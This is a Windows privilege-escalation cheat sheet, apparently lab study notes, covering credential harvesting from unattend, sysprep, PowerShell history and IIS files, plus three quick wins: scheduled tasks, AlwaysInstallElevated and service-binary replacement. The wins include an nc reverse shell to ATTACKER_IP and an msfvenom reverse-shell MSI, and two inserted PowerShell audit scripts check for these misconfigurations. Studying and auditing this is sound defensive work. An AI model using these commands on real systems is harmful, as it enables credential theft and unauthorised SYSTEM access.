Windows PrivEsc

Password Harvesting

The easiest way to elevate privileges is often to harvest credentials that applications and installers have left behind on the host.

Unattended Windows Installations:

Credentials left behind by unattended Windows installations may remain in:

  • C:\Unattend.xml

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Unattend\Unattend.xml

  • C:\Windows\system32\sysprep.inf

  • C:\Windows\system32\sysprep\sysprep.xml

Example of a leftover credential block inside one of these files:

<Credentials>
    <Username>Administrator</Username>
    <Domain>thm.local</Domain>
    <Password>MyPassword123</Password>
</Credentials>
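The following is an added audit script, not part of the original notes, that a defender can run to find out whether an installation left credentials on disk. It walks the five paths listed above, parses the XML files for password elements (both the flat form shown above and the Microsoft unattend schema form with Value/PlainText children) and the INI-style sysprep.inf for AdminPassword lines, and reports where a live secret still sits without printing the secret itself. The path list and element names are assumptions taken from the list above and from the unattend schema; the `*SENSITIVE*DATA*DELETED*` marker is what Windows Setup writes over secrets it has already processed.

```powershell
# Added audit example; not part of the original notes. Scans the unattend and
# sysprep locations listed above for credential elements an installation left
# behind and reports where they are, without echoing the secret itself.
# The path list and the element names are assumptions taken from the list above
# and from the Microsoft unattend schema (Password/Value/PlainText).
$UnattendPaths = @(
    'C:\Unattend.xml',
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\system32\sysprep.inf',
    'C:\Windows\system32\sysprep\sysprep.xml'
)

# Windows Setup overwrites processed secrets with this marker; a file that still
# carries a real value is the finding that matters.
$ScrubbedMarker = '*SENSITIVE*DATA*DELETED*'

function Get-XmlCredentialFindings {
    param([string]$Path)
    try   { [xml]$doc = Get-Content -LiteralPath $Path -Raw -ErrorAction Stop }
    catch { Write-Warning "Cannot parse $Path as XML: $_"; return }

    # Match password elements in any namespace: both the flat form shown above and
    # the schema form <Password><Value>base64</Value><PlainText>false</PlainText></Password>
    $xpath = '//*[local-name()="Password" or local-name()="AdministratorPassword"]'
    foreach ($node in $doc.SelectNodes($xpath)) {
        $valueNode = $node.SelectSingleNode('*[local-name()="Value"]')
        $plainNode = $node.SelectSingleNode('*[local-name()="PlainText"]')
        $secret    = if ($null -ne $valueNode) { $valueNode.InnerText.Trim() } else { $node.InnerText.Trim() }
        $encoding  = if ($null -ne $plainNode -and $plainNode.InnerText.Trim() -eq 'false') { 'base64' } else { 'plaintext' }
        [pscustomobject]@{
            File      = $Path
            Element   = "$($node.ParentNode.Name)/$($node.Name)"
            HasSecret = ($secret.Length -gt 0 -and $secret -ne $ScrubbedMarker)
            Encoding  = $encoding
        }
    }
}

function Get-IniCredentialFindings {
    param([string]$Path)
    $lineNo = 0
    foreach ($line in Get-Content -LiteralPath $Path) {
        $lineNo++
        # Classic sysprep.inf keeps the local admin password as [GuiUnattended] AdminPassword=...
        if ($line -match '^\s*(?<key>AdminPassword|Password)\s*=\s*(?<val>.*?)\s*$') {
            $val = $Matches['val'].Trim('"')
            [pscustomobject]@{
                File      = $Path
                Element   = "line $lineNo ($($Matches['key']))"
                HasSecret = ($val.Length -gt 0 -and $val -ne '*')   # '*' means no password was set
                Encoding  = 'plaintext'
            }
        }
    }
}

function Find-LeftoverInstallCredentials {
    param([string[]]$Paths = $UnattendPaths)
    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p -PathType Leaf)) { continue }
        if ([IO.Path]::GetExtension($p) -ieq '.xml') { Get-XmlCredentialFindings -Path $p }
        else                                          { Get-IniCredentialFindings -Path $p }
    }
}

$findings = @(Find-LeftoverInstallCredentials)
$findings | Format-Table -AutoSize
if ($findings | Where-Object HasSecret) {
    Write-Warning 'Installation credentials are still on disk: delete these files or scrub the elements, and rotate the passwords they contain.'
}
```

Run it from an elevated PowerShell prompt on a freshly provisioned image before it is handed to users; a row with `HasSecret` equal to True means the file should be deleted (or the element scrubbed) and the password rotated, since any local user who can read the file holds that credential.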

PowerShell History

:: From cmd.exe; %userprofile% is expanded by cmd (in PowerShell use $env:USERPROFILE)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

:: List credentials stored by Credential Manager
cmdkey /list

:: Run a command with the stored credential for that user
runas /savedcred /user:admin cmd.exe

IIS Config

  • C:\inetpub\wwwroot\web.config

  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

:: Look for connection strings, which often embed database credentials
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

PuTTY saved sessions (proxy credentials are stored in the registry):

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Quick wins

Scheduled Tasks

:: View Scheduled Tasks
schtasks

:: View more info for each task
schtasks /query /tn vulntask /fo list /v

:: Check whether the current user can modify the file the task runs
icacls c:\path\to\vulntask

:: Replace the task's script with an nc reverse shell (assuming nc is installed in c:\tools)
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask

AlwaysInstallElevated

:: Both values (HKCU and HKLM) must be set to 1 for this to work
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Create a malicious MSI that abuses the install permissions:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

Run the MSI on the Windows host:

msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Service-based

:: Query the service configuration (binary path, run-as account)
sc qc <service name>

:: Check permissions on the service binary
icacls <path to bin>

:: Back up the original service binary
move WService.exe WService.exe.bkp

:: Replace it with the malicious service binary
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

:: Restart the service
sc stop windowsscheduler
sc start windowsscheduler
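The three quick wins above (Scheduled Tasks, AlwaysInstallElevated, Service-based) all come down to the same misconfiguration: something that runs with high privileges is controlled by a file or policy a low-privileged user can change. The script below is an added, read-only audit written for this page; it is not part of the original notes. It enumerates every service binary and scheduled-task action file, reports those on which `Everyone`, `Users`, `Authenticated Users` or `INTERACTIVE` hold write rights, and checks whether AlwaysInstallElevated is set to 1 in both hives. The group list, the file-extension heuristic for unquoted command lines, and the generic-rights bit values are assumptions noted in the comments; `Get-ScheduledTask` needs the ScheduledTasks module (Windows 8 / Server 2012 and later).

```powershell
# Added audit example; not part of the original notes. Read-only check for the
# three quick-win conditions above: scheduled-task action files and service
# binaries that a low-privileged principal can modify, and the AlwaysInstallElevated
# policy being enabled in both hives. The group list is an assumption; extend it
# with any broad groups used in your environment. Get-ScheduledTask needs the
# ScheduledTasks module (Windows 8 / Server 2012 and later).
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let the holder replace or alter a file. Some ACEs carry generic
# rights as raw bits (GENERIC_WRITE 0x40000000, GENERIC_ALL 0x10000000).
$WriteMask   = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, Delete, ChangePermissions, TakeOwnership, FullControl'
$GenericMask = 0x40000000 -bor 0x10000000

function Get-LowPrivWriter {
    # Returns the first low-privileged principal with write access to $Path, or $null
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $null }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if ($null -eq $acl) { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band $WriteMask) -ne 0 -or ($rights -band $GenericMask) -ne 0) {
            return $ace.IdentityReference.Value
        }
    }
    return $null
}

function Get-ExecutableFromCommand {
    # Pulls the program path out of a service PathName or task action string
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
    }
    # Unquoted: assume the program ends at the first .exe/.bat/.cmd/.ps1 token (heuristic)
    $m = [regex]::Match($cmd, '^(.+?\.(exe|bat|cmd|ps1))(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($cmd -split '\s+')[0]
}

function Get-WritableServiceBinaries {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ExecutableFromCommand $svc.PathName
        if (-not $exe) { continue }
        $writer = Get-LowPrivWriter -Path $exe
        if ($writer) {
            [pscustomobject]@{ Type = 'Service'; Name = $svc.Name; RunsAs = $svc.StartName; File = $exe; WritableBy = $writer }
        }
    }
}

function Get-WritableTaskActions {
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = Get-ExecutableFromCommand $action.Execute
            if (-not $exe) { continue }
            $writer = Get-LowPrivWriter -Path $exe
            if ($writer) {
                [pscustomobject]@{ Type = 'ScheduledTask'; Name = "$($task.TaskPath)$($task.TaskName)"; RunsAs = $task.Principal.UserId; File = $exe; WritableBy = $writer }
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # The policy is only effective when the value is 1 under BOTH hives
    $keys = @('HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
              'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer')
    foreach ($key in $keys) {
        $v = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if (-not ($v -and $v.AlwaysInstallElevated -eq 1)) { return $false }
    }
    return $true
}

$findings = @(Get-WritableServiceBinaries) + @(Get-WritableTaskActions)
$findings | Format-Table -AutoSize
foreach ($f in $findings) {
    Write-Warning "$($f.Type) '$($f.Name)' runs as $($f.RunsAs) from a file writable by $($f.WritableBy); remove that principal's write rights (icacls /remove) and verify the file's hash."
}
if (Test-AlwaysInstallElevated) {
    Write-Warning 'AlwaysInstallElevated is 1 in HKLM and HKCU: any user can install an MSI as SYSTEM. Set both values to 0 via Group Policy.'
}
```

Run it elevated so that every service and task is visible. Each finding names the principal whose write access needs to be removed and the account the privileged component runs as, which is the information needed to prioritise the fix; a binary that is writable by `Everyone` and runs as `LocalSystem` is the exact condition the `icacls WService.exe /grant Everyone:F` line above creates.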

Permission abuse

:: List the privileges held by the current user
whoami /priv

On the attacker machine, host an SMB share:

mkdir share
/opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
